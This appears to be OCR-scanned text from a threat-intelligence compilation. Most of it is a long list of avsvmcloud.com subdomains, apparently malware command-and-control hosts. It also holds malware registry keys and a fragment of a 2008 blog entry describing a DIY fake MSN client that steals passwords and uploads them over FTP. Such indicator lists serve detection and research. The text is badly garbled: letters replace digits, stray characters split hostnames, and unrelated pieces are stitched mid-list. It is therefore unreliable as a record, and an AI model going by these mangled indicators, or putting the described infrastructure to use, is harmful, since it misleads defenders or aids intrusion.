m8isa3tqc2ktrup0e2q0b12eul.appsync-api.us-east-1.avsvmcloud.com 
m8pq26o0oke896hu100iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 
m9m73qmegcqc1m5281s8qal.appsync-api.us-east-2.avsvmcloud.com 
m9q27ja0deqllgn25lajea0.appsync-api.us-west-2.avsvmcloud.com 
mai8mje63ah68qtuc8583a0.appsync-api.us-east-1.avsvmcloud.com 
map2p7okj5brcdnumj28mal.appsync-api.us-east-1.avsvmcloud.com 
mb2v3cgjgmohahgOf630te2h.appsync-api.us-west-2.avsvmcloud.com 
mbdgticvhtvg6ma0euheoip0el2eul.appsync-api.us-west-2.avsvmcloud.com 
md5p22a3ub4r56upo7v0.appsync-api.us-west-2.avsvmcloud.com 
md62eg6fblbglbupm721.appsync-api.us-west-2.avsvmcloud.com 
mdjurirqli2nhcuok1lv82tl.appsync-api.us-east-2.avsvmcloud.com 
mdqrru04vm1loucnpd7uq.appsync-api.us-west-2.avsvmcloud.com 
meo2i7ctrcunsjtg3js9.appsync-api.us-west-2.avsvmcloud.com 
mf516006j2joedil1lunOc2dioho7r1lpOc.appsync-api.us-east-2.avsvmcloud.com 
mfgsshts56t2qjn00ie2h.appsync-api.us-east-2.avsvmcloud.com 
mgkqij3ukpm9k9c100iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
mgvft0du4bvbbggOtvef0212eul.appsync-api.us-east-1.avsvmcloud.com 
mh68a5f7khcldn5il7pd.appsync-api.us-east-2.avsvmcloud.com 
mhdosoksaccf9sniYicp.appsync-api.eu-west-1.avsvmcloud.com 
mhtprocshr2sidu2bgg8ead.appsync-api.us-west-2.avsvmcloud.com 
mj5seh6iatbo2obleoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
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mjg6gjba76hifg206d6n0e6jOceu.appsync-api.us-east-1.avsvmcloud.com 
mjneOsq5tgndtvO1lwouhOlovwrvorvi0.appsync-api.us-east-1.avsvmcloud.com 


mjnqpjo2k239194100iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 


mm7tpdlad7d01m71wh60cunOgwusouv0.appsync-api.us-west-2.avsvmcloud.com 


mm7tpdlad7d01m91wh60tunO0ewusouvoO.appsync-api.us-west-2.avsvmcloud.com 
mmabgu5 lidip3vllwh60eun0ewusouv0.appsync-api.us-west-2.avsvmcloud.com 
mmt7d1tp3q68ehv0e6u0c12eul.appsync-api.us-west-2.avsvmcloud.com 
mmvl9dhqj5vOcrdOvuesO2e2h.appsync-api.us-west-2.avsvmcloud.com 
mn29547gfgrfeinob75jhtk.appsync-api.us-east-1.avsvmcloud.com 
mp1647heaepffs5orld8htg.appsync-api.us-west-2.avsvmcloud.com 
mpl2e56fllbklbupm1p8.appsync-api.us-west-2.avsvmcloud.com 
mpqcemiip5vpm9up0186.appsync-api.us-west-2.avsvmcloud.com 
mq5fi29tu2urh8tgi6vr.appsync-api.us-west-2.avsvmcloud.com 
mq7ofub5sgjrl3tgv6hv.appsync-api.us-west-2.avsvmcloud.com 
mq9cupum3f59km5gacu6.appsync-api.us-west-2.avsvmcloud.com 
mq9l6chjtduidqnuq8983af.appsync-api.us-east-2.avsvmcloud.com 
mr2k2ao5uploecel6otvuifsrcuvjOcl.appsync-api.us-west-2.avsvmcloud.com 
mr8cedvf8ps29pm0vnr2.appsync-api.us-west-2.avsvmcloud.com 
mrcusokogsfar0jl1wh60eun02wusouv0O.appsync-api.us-west-2.avsvmcloud.com 
mre9ue67vo4ip3sOvri.appsync-api.us-west-2.avsvmcloud.com 
mrftop7md6n0t3n1lwh60cunOowusouv0.appsync-api.us-west-2.avsvmcloud.com 
mrlf027vaikgovl0co6e20bovi.appsync-api.us-west-2.avsvmcloud.com 
mrtv6930a6vt9ed1004udkr2ftq4qnfm.appsync-api.us-west-2.avsvmcloud.com 
mt6g9l2fp7ufueuuv6a8mah.appsync-api.us-east-1.avsvmcloud.com 
mthtak04l8iurhtu4c18ma7.appsync-api.us-east-1.avsvmcloud.com 
mugdmdgshO6npgqnijfcp8fth.appsync-api.us-east-1.avsvmcloud.com 
munn2pbs9nucri5js818ft5.appsync-api.eu-west-1.avsvmcloud.com 
mut2v1luj6cbufdnnh6o02.appsync-api.us-east-1.avsvmcloud.com 

mv 1tid7qdcpO5mrlwh60cun02wusouvO0.appsync-api.us-west-2.avsvmcloud.com 
mv2go5nr2q5oktrlds2n0o3uho1i2v0c.appsync-api.us-west-2.avsvmcloud.com 
mv2rig9h6u4nh8llunOvOpz0ehij0012.appsync-api.us-west-2.avsvmcloud.com 
mva8fjhsterd3bd100mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
mvadv7g11g9hro00h.appsync-api.us-west-2.avsvmcloud.com 
nOmé6b6ojqlho60m35mt7.appsync-api.us-west-2.avsvmcloud.com 


n0ue0899p6784gr30ipf.appsync-api.us-east-2.avsvmcloud.com 
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nllef2btk559bjkle6u0b12eul1.appsync-api.us-west-2.avsvmcloud.com 
nl1p7eqtl39457iilurso2ve2sd0ge2h.appsync-api.us-west-2.avsvmcloud.com 
n2pr07bg2oafkivlkbcd3if.appsync-api.us-east-1.avsvmcloud.com 
n3atscbl8r7ro7ile2qgO0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
n4vsqps47fvaiom183sbiih.appsync-api.us-east-1.avsvmcloud.com 
n545cie5nt9ri0m34vih.appsync-api.us-east-2.avsvmcloud.com 
n6eng19tquug7562e60i3up6ium0212e.appsync-api.us-east-2.avsvmcloud.com 
n6fr769sh71lspcle2mvri02e2mO0ie2h.appsync-api.us-east-2.avsvmcloud.com 
n73qmquel1f470rl11le6e00lwu0be2h.appsync-api.us-east-2.avsvmcloud.com 
n74ejupohk2grmn15u0ilel.appsync-api.us-east-2.avsvmcloud.com 
n7f3hOfgnigk2uq2wol11r02irssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
n7vjvhiseciubdd20i60couGiuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
n8mam162tt83g0d20i60gouG6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
na4492bhtq5m1jm59mpdor9.appsync-api.us-west-2.avsvmcloud.com 
nadurdjt87t6cgm8ebga.appsync-api.us-west-2.avsvmcloud.com 
nbO7n2hkshm204k1re2cuvjOcts2fd.appsync-api.us-east-1.avsvmcloud.com 
nb5skp5mht7pn2ulutl2uvOgun6.appsync-api.us-east-1.avsvmcloud.com 
nbj2n5htt2epur31u0if6.appsync-api.us-east-1.avsvmcloud.com 
nbkg2k5i60gl4rv2uhsOce2sdO0govirl.appsync-api.us-east-1.avsvmcloud.com 
nbm5cn6i7fngfk21tvef0b12eul.appsync-api.us-east-1.avsvmcloud.com 
ncdOdudrutavm6qlvwObf6.appsync-api.us-east-2.avsvmcloud.com 
ndcumddgi5t50kbeor39.appsync-api.eu-west-1.avsvmcloud.com 
ndf73andtqaomaqve4feb.appsync-api.us-east-1.avsvmcloud.com 
ndo7v39|5dnbasvfnfs9pik.appsync-api.us-east-1.avsvmcloud.com 
nftt6cmr8b1r2791e2q0b12eul1.appsync-api.eu-west-1.avsvmcloud.com 
ngOtet912lupnh1l1vri0cwr6i52sOtnj.appsync-api.us-west-2.avsvmcloud.com 
ngf7qcl12uj2|6flovirv6éowrOiovi.appsync-api.us-west-2.avsvmcloud.com 
nj6pv3s53meviitlOO0osv6éimi5r2.appsync-api.us-west-2.avsvmcloud.com 
nji949lvrktjd5 7200mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
njiee4m3ku99d691e6u0012eul1.appsync-api.us-west-2.avsvmcloud.com 
nkllqnpfcpm6ivbedvpj.appsync-api.us-west-2.avsvmcloud.com 
nl3u27u4qu181192f60tnr12oiir0ie2.appsync-api.us-east-2.avsvmcloud.com 
nlqOhq144pfp5t12q535z0g3rq1rii0t.appsync-api.us-east-2.avsvmcloud.com 
nmepc9ul23j2bqs16d6n0c6jOceu.appsync-api.us-east-1.avsvmcloud.com 
nmsi7h45aiu9d5220i60cou6iuirOcrn.appsync-api.us-east-1.avsvmcloud.com 
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HKEY —LOCAL —MACHINE\SYSTEM\ControlSet0O01\Enu = m\Root\LEGACY —BURITO1205- 
67D5\0000 HKEY ~LOCAL —_MACHINE\SYSTEM\ControlSet001\Ser vices\burito1205-67d5 
HKEY LOCAL MACHINE\SYSTEM\ControlSet001\Ser vices\burito1205-67d5\Security 


Surprisingly, there are no client-side vulnerabilities used in last two campaigns. 


1. http: //ddanchev. blogspot .com/2007/12/riders-on-storm-worm.htm 


4.1.10 DIY Fake MSN Client Stealing Passwords (2008-01-17 16:44) 


Custom Error MSG 


Custom error message 


Cannot load your settings, default one loaded. | Li] 


Chars: 46 


After Getting Password 
© Kill MSN after getting password (4) 
(@ Recover MSN after getting password (4) 


FTP Details 


FTP Host/IP 


Username 


Password | (4) 


This tool deserves our attention mostly because of its [1]do-it-yourself (DIY) [2]nature, just 
[3]like the [4]many other [5]related ones | [6]discussed before. Custom error messages, two 
options for to kill or restore MSN after the password is obtained, and custom FTP settings to 
upload the accounting data. Why did they choose FTP compared to email as the leak point 
for the data? From my perspective uploading the accounting data on an FTP server means 


1272 


nnbggtirlivOv3vfnfaddfe.appsync-api.us-west-2.avsvmcloud.com 
nq97kdu88pnlaqpv8sf3t5.appsync-api.us-east-1.avsvmcloud.com 
nr2ia9qfa349b0q20i60bou6iuirO2rn.appsync-api.us-east-1.avsvmcloud.com 
nrclvha53kd856m200iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
nrngokng6éallbri2uhsOoe2sdO0oovirl.appsync-api.us-east-1.avsvmcloud.com 
nsirblj3ijajrrr1lbedii9.appsync-api.us-west-2.avsvmcloud.com 
nsp7bdhj8eh6eOmtnmid.appsync-api.us-west-2.avsvmcloud.com 
nst98f60ui0415m1p3idrin.appsync-api.us-east-2.avsvmcloud.com 
nub2s2007ocq3lbtdo9l.appsync-api.us-west-2.avsvmcloud.com 
nub7c9hpqgmvs9b19budiih.appsync-api.us-east-2.avsvmcloud.com 
nugO1cgrr9mkgbvtob46.appsync-api.us-east-2.avsvmcloud.com 
nusjlhiOcbup1jm1vb19ril.appsync-api.us-east-2.avsvmcloud.com 
nvOoceajlsib0aal2eul.appsync-api.us-east-1.avsvmcloud.com 
nvg9tuumdrskpeh1f6.appsync-api.us-east-1.avsvmcloud.com 
nvj83eprhg9c83630fge72o0svgj9ag3m.appsync-api.us-east-1l.avsvmcloud.com 
nvkeviggqeq5bn151c2jOte2h.appsync-api.us-east-1.avsvmcloud.com 
nvu2f35sbk5soef200mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
o0r2fOsk6coiqkjo3rqc.appsync-api.us-west-2.avsvmcloud.com 
o2nkbnkqiu61lg4guvmkn.appsync-api.us-east-1.avsvmcloud.com 
03c181q6605iiig3e002nfclovOgeu0i.appsync-api.us-east-1.avsvmcloud.com 
o3i9qb2i5ttq854300iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
o03i9qb2i5ttq85j300iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
o3picb47gm16brb26d6n0t6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
o3qerlfpd9sns5m2tvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
04a9r2v4dfp6gqlurmtu.appsync-api.eu-west-1.avsvmcloud.com 
057nua2vmmmcs4jofitb.appsync-api.us-west-2.avsvmcloud.com 
o5hsqq8idcv4adjoaf75.appsync-api.us-west-2.avsvmcloud.com 
o5vc8cbaejuol6jp3rgg44i.appsync-api.us-east-2.avsvmcloud.com 
06314birsnn4djh21ui2.appsync-api.us-west-2.avsvmcloud.com 
o063cev80bs41d012e6u0el12eul.appsync-api.us-west-2.avsvmcloud.com 
o063cev80bs41d0f2e6u0g12eul.appsync-api.us-west-2.avsvmcloud.com 
0695qnk7hrla68v3wh60cunOewusouv0.appsync-api.us-west-2.avsvmcloud.com 
o6me9l8dilmtaok4300mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
o6tn8j7g7d90h9e3wh6O0tunO02wusouvO0.appsync-api.us-west-2.avsvmcloud.com 


o6tn8j7g7d90h9e3wh6OtunOtwusouvoO.appsync-api.us-west-2.avsvmcloud.com 
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o7ccffjubOulb5n2e6u0c1l2eul.appsync-api.us-west-2.avsvmcloud.com 
o7ojmhgbgalidei3ds2n0e3uho1li2v0e.appsync-api.us-west-2.avsvmcloud.com 
o7rc6mr3vtmhpcq2udf0ghv.appsync-api.us-west-2.avsvmcloud.com 
o7rp30pdfl5gh9i2t1f0be2h.appsync-api.us-west-2.avsvmcloud.com 

o83sjajb 7b5b6fl2i.appsync-api.us-east-2.avsvmcloud.com 
o8dvftv72kvtg6p30i60bouGiuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
o8vmi1vtolcaurn72u3002st.appsync-api.us-east-2.avsvmcloud.com 
oainvkt5cm86ui8j4bkh.appsync-api.us-west-2.avsvmcloud.com 
obrd90372tfOgsv300q2rofmgjrqi2os.appsync-api.eu-west-1.avsvmcloud.com 
oc9kjcOjuemased475rsqs43v5ju4oii.appsync-api.us-west-2.avsvmcloud.com 
oct7dd5e8ggcqft2e2sd0odieo00e2h.appsync-api.us-west-2.avsvmcloud.com 
oe604bq0kgaum81n7m8gbgh.appsync-api.us-east-1.avsvmcloud.com 
oesnlhOprs97gbgnmmbgoaf.appsync-api.us-east-1.avsvmcloud.com 
of7r50p3aak6kgq2h.appsync-api.us-east-1.avsvmcloud.com 
ofdlabqvgv764rt26d6n0c6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
ofhjbkipi7d0ffk3wh60gun0iwusouvO.appsync-api.us-east-1.avsvmcloud.com 
ofr9mbeg55aqt5q300iesdbOvfheOl45.appsync-api.us-east-1l.avsvmcloud.com 
og0cg7ke855dbpp25u0ilel.appsync-api.us-east-2.avsvmcloud.com 
og62jqmjt812f1126hr60t2st.appsync-api.us-east-2.avsvmcloud.com 
ogf81h2kct2idnp3un0b2dioho7r1lpO0b.appsync-api.us-east-2.avsvmcloud.com 
ogne6ltecb993802p2sji2v02e25p.appsync-api.us-east-2.avsvmcloud.com 
ogtclgitm5ali6c2i32ft3i6d2i0tovi.appsync-api.us-east-2.avsvmcloud.com 
oguoekruvv6fp3t300gsqjr3 1uru9oii.appsync-api.us-east-2.avsvmcloud.com 
ohjg61gu9kckoi800mnr.appsync-api.us-east-1.avsvmcloud.com 
oho20skjkdbrpllobrmt.appsync-api.us-east-1.avsvmcloud.com 
oikkgcj7j5i5e412e2q0b12eul.appsync-api.us-east-1.avsvmcloud.com 
oiklOog9grvédit26d6n0t6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
oillng790k8gfm33e6videdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
oiltaojO8jjd8h12vnr4tur5h.appsync-api.us-east-1.avsvmcloud.com 
oj4t2iih6dejuen300eu4ivhvu52v2ea.appsync-api.us-east-2.avsvmcloud.com 
ojescl0gakqt4bm2uv6e0et2cOtdr.appsync-api.us-east-2.avsvmcloud.com 
ojrnigtgOvpl5js2tj6h0il2eul.appsync-api.us-east-2.avsvmcloud.com 
ojvg6ud3ajuk09d30i60bouGiuirOern.appsync-api.us-east-2.avsvmcloud.com 
ok8afte80m8v7f825veh.appsync-api.us-west-2.avsvmcloud.com 
oktcsjaeee4a9f82hrg9.appsync-api.us-west-2.avsvmcloud.com 
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ol3evljklvaa2kc300mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
olc62cocacn7u2q22v02eu.appsync-api.us-west-2.avsvmcloud.com 
olhSmnOvhbgas8k3wh60cun02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
olthhiqO05pO0vcqg2urso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
onl27hveavhqeuj24ifi.appsync-api.us-west-2.avsvmcloud.com 
on8c52o0pdcb48t1li2r8gder.appsync-api.us-east-2.avsvmcloud.com 
ooad2c9fd58p4qh3uhsO0ee2sdO0oovirl.appsync-api.us-east-1.avsvmcloud.com 
00g9902p5ueq104300iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
ooglgql0Oscghm23e6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
oqm9q4jpmuott91nj30loqv.appsync-api.us-east-1.avsvmcloud.com 
orpqk4rjnsOohtu2jrpuv20212eul.appsync-api.eu-west-1.avsvmcloud.com 
os80pffirbo3eslur3fa.appsync-api.us-east-2.avsvmcloud.com 
oscmhruih5gOh91gbob1re5.appsync-api.us-east-2.avsvmcloud.com 
osdvjhur6bbg2d8g532gref.appsync-api.us-east-2.avsvmcloud.com 
ot88v8f59u82df8j9oqgl.appsync-api.us-west-2.avsvmcloud.com 
otdov9b511jsc38jvogm.appsync-api.us-west-2.avsvmcloud.com 
otk6qiltjrof35gj93ke.appsync-api.us-west-2.avsvmcloud.com 
otlrr54u7insgt8jgop8.appsync-api.us-west-2.avsvmcloud.com 
ottragsmfog8nbgnb381bq7.appsync-api.us-west-2.avsvmcloud.com 
otuucu2nh8e6el8nnbcjbq9.appsync-api.us-east-2.avsvmcloud.com 
ougss2j3t7ei1l8jgimogrev.appsync-api.us-east-2.avsvmcloud.com 
ovnm6k8vhojn2sv2e2q0c12eul.appsync-api.eu-west-1.avsvmcloud.com 
p0b450meskvfhabolv7q.appsync-api.us-west-2.avsvmcloud.com 
pOkOvvjvam42qavotr8e.appsync-api.us-west-2.avsvmcloud.com 
plj8m8blsi4dmptm400mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
p25k987i118cievuubkk.appsync-api.us-east-1.avsvmcloud.com 
p5Ojllhvh»moti8mpbf6p2di.appsync-api.us-west-2.avsvmcloud.com 
p5dqq9lil0rsm4bocfgn.appsync-api.us-west-2.avsvmcloud.com 
p5uhu6e3v8qcmamogvak.appsync-api.us-east-2.avsvmcloud.com 

p6cm3 1lihpcbni624wol1r02irssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
p6jg3t892pl69bf400h4r4fl9uh4tor3.appsync-api.us-east-2.avsvmcloud.com 
p6sa8nd1f80emte3e2sd0enwn0oe2h.appsync-api.us-east-2.avsvmcloud.com 
p7ij6im26ncmc5q4002sdoimd18ak2o0b.appsync-api.us-east-2.avsvmcloud.com 
p8kf9ap03fvmll94wh60iunO2wusouvO.appsync-api.us-west-2.avsvmcloud.com 


p8sqj81kv6f3kc636e050ge2h.appsync-api.us-west-2.avsvmcloud.com 
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pat8lfjnqgnulm1bj306s.appsync-api.us-east-2.avsvmcloud.com 
pb5d7fu0uoi4r3436d6n0c6j0O2eu.appsync-api.us-east-1.avsvmcloud.com 
pbdrcv4gqfph47o04o0i60tou6iuirOorn.appsync-api.us-east-1.avsvmcloud.com 
pbgr4u20gqqnq1lu4eoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
pbsl2I5fb0jg4df4uhsOie2sdO02ovirl.appsync-api.us-east-1.avsvmcloud.com 
pc369ffqt7bs4r140i60touGiuirOcrn.appsync-api.us-east-2.avsvmcloud.com 
pesgu74gvumskirnjmgqpbd7.appsync-api.us-east-1.avsvmcloud.com 
ph1p8rc7tl65klboev3e.appsync-api.us-east-1.avsvmcloud.com 
pj9066fr5s7jgk145063rscusi2vove0.appsync-api.us-west-2.avsvmcloud.com 
pja8e4n7ep72svv4exr09ovirsvul00e.appsync-api.us-west-2.avsvmcloud.com 
pjslf3u984n0ad93urso2ve2sd0ge2h.appsync-api.us-west-2.avsvmcloud.com 
pjv2soembqd28le3euheoip0i12eul.appsync-api.us-west-2.avsvmcloud.com 
pm52tjbjjvpag9p4e2sd0i6iovtsupno.appsync-api.us-east-1.avsvmcloud.com 
pmhdcvu7u3g4bm636d6n0t6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
pmiagmur2r6nmkq400h4r4fl9uh4tor3.appsync-api.us-east-1.avsvmcloud.com 
pmr8uqddt7pi9n83f.appsync-api.us-east-1.avsvmcloud.com 
ps725bisOueqlvru3bqq.appsync-api.us-west-2.avsvmcloud.com 
psf6étbrpajilpkmg43gprpn.appsync-api.us-east-2.avsvmcloud.com 
psuuhgq7nncum5cvu/7/hkf.appsync-api.us-east-2.avsvmcloud.com 
ptlnog3qgdk29cvj4baf.appsync-api.us-east-2.avsvmcloud.com 
pt8d1kolvgr3b0bne3geodf.appsync-api.us-west-2.avsvmcloud.com 
pt9qmalg50i4m4mjc31j.appsync-api.us-west-2.avsvmcloud.com 
pup59pgjll8m2cmg4mtpmpv.appsync-api.us-east-2.avsvmcloud.com 
pv9davtvufl44m336d6n0b6j02eu.appsync-api.us-east-1.avsvmcloud.com 
pv9davtvufl44me36d6n0c6j0ieu.appsync-api.us-east-1.avsvmcloud.com 
pv9davtvufl44mm36d6n0b6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
qOme4k7cgtk85ba2d1kfqOn.appsync-api.us-east-1.avsvmcloud.com 
qlOncmprlid7tv04vedu0t12e.appsync-api.us-east-1.avsvmcloud.com 
qlb91c4fdd7q4td56rswoiou0govirsv.appsync-api.us-east-1.avsvmcloud.com 
q2ijmpjaOvgjpO0jfemov5f.appsync-api.us-east-2.avsvmcloud.com 
q3b8h3lm9q7eo0qa56260kun0e6iuir0e.appsync-api.us-east-2.avsvmcloud.com 
q3vcrhhcmddh7rl5o0i6020u6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
q445hrnho9cg3isn4ljp.appsync-api.us-west-2.avsvmcloud.com 
q47bcl9ibtmf9e0n8j81.appsync-api.us-east-2.avsvmcloud.com 
q4kb6fclb55m22ajc6q3fnl.appsync-api.us-west-2.avsvmcloud.com 
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q4nh2ntqoc4i980nh6pf.appsync-api.us-west-2.avsvmcloud.com 
q5fj4mmbadd9duaiblcl.appsync-api.us-east-1.avsvmcloud.com 
q80cgv4eolosbfo4tvef0tl2eul.appsync-api.us-east-1.avsvmcloud.com 
q882csbrq50a58d4r6eud0i2st.appsync-api.us-east-1.avsvmcloud.com 
q8bps26mocuq6re4dutru70ct2w.appsync-api.us-east-1.avsvmcloud.com 
q8g1l1lthobvg6d604tvef0b12eul.appsync-api.us-east-1.avsvmcloud.com 
q8g1l1lthobvg6d674tvef0el2eul.appsync-api.us-east-1.avsvmcloud.com 
q8vmaei8n3dpeui5vr2d32i2voe60be2.appsync-api.us-east-1.avsvmcloud.com 
q94idf4sjbemOrait7gv.appsync-api.us-west-2.avsvmcloud.com 
q987hjhp427iphsiklq4.appsync-api.us-west-2.avsvmcloud.com 
q9f2a667bb6p6t02sla3e0l.appsync-api.us-east-2.avsvmcloud.com 
q9iul8013e6qurk2k7uogOr.appsync-api.us-west-2.avsvmcloud.com 
q9q772a490qkum02tg0oe0!l.appsync-api.us-east-2.avsvmcloud.com 
qa4n58gl90jcghkgp8vm.appsync-api.us-east-1.avsvmcloud.com 
qb45pba45cj9m40500mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
qb45pba45cj9m4s500mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
qb9it88vftri6bv84euheoip0el2eul.appsync-api.us-west-2.avsvmcloud.com 
qbj26i5jnkrqdacSwh602un0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
qdinnm3pklgbguao27to95n.appsync-api.us-west-2.avsvmcloud.com 
qdkbmbhO50afrfkpm719.appsync-api.us-west-2.avsvmcloud.com 
qegmhsh6v9agpoOudjtomOf.appsync-api.us-west-2.avsvmcloud.com 
qemOuje2 7t36fvsuuchf30h.appsync-api.us-east-2.avsvmcloud.com 
qfnf6ab6u28je4d5un0b2dioho7r1lpOb.appsync-api.us-east-2.avsvmcloud.com 
qfnf6ab6u28je4i5unOc2dioho7r1pOc.appsync-api.us-east-2.avsvmcloud.com 
qgOunjs2fe8alud50042rsimd18ak20b.appsync-api.us-east-1.avsvmcloud.com 
qgle4bctbk3gdkr4e2sd0bdieo0be2h.appsync-api.us-east-1.avsvmcloud.com 
qgc2gj97t3sop4i5uhsObe2sdO0govirl.appsync-api.us-east-1.avsvmcloud.com 
qgdubrodalvph414srd6sw0oe2h.appsync-api.us-east-1.avsvmcloud.com 
qi4q6469i39es2e4f6.appsync-api.us-east-2.avsvmcloud.com 
qifvfmsk33ebgg849 1lhqa6omgu8eap.appsync-api.us-east-2.avsvmcloud.com 
qipotpfljicd4gav50i60eou6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
qit94i5tqf2j9maq5wol1r02irssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
qjlbggoa06prfj646d6n0g6j02eu.appsync-api.us-east-1.avsvmcloud.com 
qj82njdvtfuoi455uhsObe2sd0govirl.appsync-api.us-east-1.avsvmcloud.com 
qim8h5t6lm8u7cp500mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
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qnr96j5e5lvhcrsovioo95n.appsync-api.us-east-1.avsvmcloud.com 
qo046rspifbl4k04e2mvridge2mO0te2h.appsync-api.us-east-2.avsvmcloud.com 
qq7tfug5sk8rriagq6hu.appsync-api.us-west-2.avsvmcloud.com 
qr433196827kfil50Omudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
qrieo21mré659tfk5wh60iunObwusouvO.appsync-api.us-west-2.avsvmcloud.com 
qrjtdj3alnicjOk4urso2ve2sd0be2h.appsync-api.us-west-2.avsvmcloud.com 
qslbgn60785guuani6gn.appsync-api.eu-west-1.avsvmcloud.com 
qvot463cl5rcg5r4urso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
r03pbpfeb6b84hoigvr5.appsync-api.us-west-2.avsvmcloud.com 
r0bs4ljom79j6koitvu0.appsync-api.us-west-2.avsvmcloud.com 
r0jsdg82mé60jknoitr4e.appsync-api.us-west-2.avsvmcloud.com 
r14ptgkl7qacucu5chsv0ee2h.appsync-api.us-west-2.avsvmcloud.com 
rla5v81snarbmmk600mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
rlq6arhpujcf6job6ervisul0odohuOit.appsync-api.us-west-2.avsvmcloud.com 
riqshojO5ji05ac6eoipO2jovt6i2vO0c.appsync-api.us-west-2.avsvmcloud.com 
r2m52d163mfqO0j3jamq5vuf.appsync-api.us-east-1.avsvmcloud.com 
r2pnsql432mgsbojhma5fu9.appsync-api.us-east-1l.avsvmcloud.com 
r5ibotbpe95ipl32sf7nesg.appsync-api.us-west-2.avsvmcloud.com 
r50297chvc6usooimisc.appsync-api.us-west-2.avsvmcloud.com 
r5ta59un17jqidiisvOo.appsync-api.us-east-2.avsvmcloud.com 
r63j187q2k0rcje6w2ersue2hhfvoeui.appsync-api.us-east-2.avsvmcloud.com 
r69ncekf56jlkkr60i6020uG6iuirO2rn.appsync-api.us-east-2.avsvmcloud.com 
réb5cj43deojp665u30c2st.appsync-api.us-east-2.avsvmcloud.com 
r74br8r0cce4m6r6oi60eouG6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
r75n0q0557bl6nv6o0i60couGiuirOorn.appsync-api.us-east-2.avsvmcloud.com 
r761pv5v4sdk6hi600qsdsi5f5jha6b9.appsync-api.us-east-2.avsvmcloud.com 
r7i37ref137vibO5p2sji2v02e25p.appsync-api.us-east-2.avsvmcloud.com 
r7j506qtdp6joj35u30c2st.appsync-api.us-east-2.avsvmcloud.com 
r7kqk893t5lu82j6uhsOie2sdOiovirl.appsync-api.us-east-2.avsvmcloud.com 
r83ggmvu8h772nc6wh602un02wusouvO.appsync-api.us-west-2.avsvmcloud.com 
r8p6o03htj2d80sr52v0ceu.appsync-api.us-west-2.avsvmcloud.com 
r8p6o03htj2d8osr6nf55rsove2fvip0b.appsync-api.us-west-2.avsvmcloud.com 
r8sei9c4qpe40q65hom2v30110ce2h.appsync-api.us-west-2.avsvmcloud.com 
r8stkst7 lebqgj66ervisulO0bdohu0gt.appsync-api.us-west-2.avsvmcloud.com 
ra4ovrb531jjc33gvbj0.appsync-api.us-west-2.avsvmcloud.com 
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ra8sbj8jq6hokk3gtmq0.appsync-api.us-west-2.avsvmcloud.com 
ro3a85702bd1gnd5tvc0212eul.appsync-api.us-east-1.avsvmcloud.com 
rb9b9ql5qqmf4ni6004sdjfefgee7600.appsync-api.us-east-1l.avsvmcloud.com 
rocu5i6ptab72jm5sr6ds2n02e2h.appsync-api.us-east-1.avsvmcloud.com 
rbgkl8sa6ohsv1s56d6n0t6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
rcOn7qkh5colsnd6oi60iou6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
rcOn7qkh5colsnr6o0i60iouGiuirOern.appsync-api.us-east-2.avsvmcloud.com 
rcd880j010cgbfr5s2phrslovOge2h.appsync-api.us-east-2.avsvmcloud.com 
rd0g68c30p6h61fovfh5hul.appsync-api.us-east-1.avsvmcloud.com 
rjJ4eohcbqht4ae45hom2v30110ie2h.appsync-api.us-west-2.avsvmcloud.com 
rjea2l3iiub59d95e6u0g12eul.appsync-api.us-west-2.avsvmcloud.com 
rk5alfi26kk3ag30qvin9up.appsync-api.us-west-2.avsvmcloud.com 
rk60ts8gamoc5pionign2ud.appsync-api.us-east-2.avsvmcloud.com 

rkhihvc7 6hfo4iioifc5 9ul.appsync-api.us-east-2.avsvmcloud.com 
rlg3ciehlovvooh5p2sji2v00e25p.appsync-api.us-east-2.avsvmcloud.com 
rinjt31g18d5h1c66iu550eire3vo2v0.appsync-api.us-east-2.avsvmcloud.com 
risbbcr7c6t4vjk60i60touGiuirOorn.appsync-api.us-east-2.avsvmcloud.com 
rmgf4i3ea0pqlih56s20gwr6i52sOgnj.appsync-api.us-east-1l.avsvmcloud.com 
rmik6csc635sm7456d6n0c6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
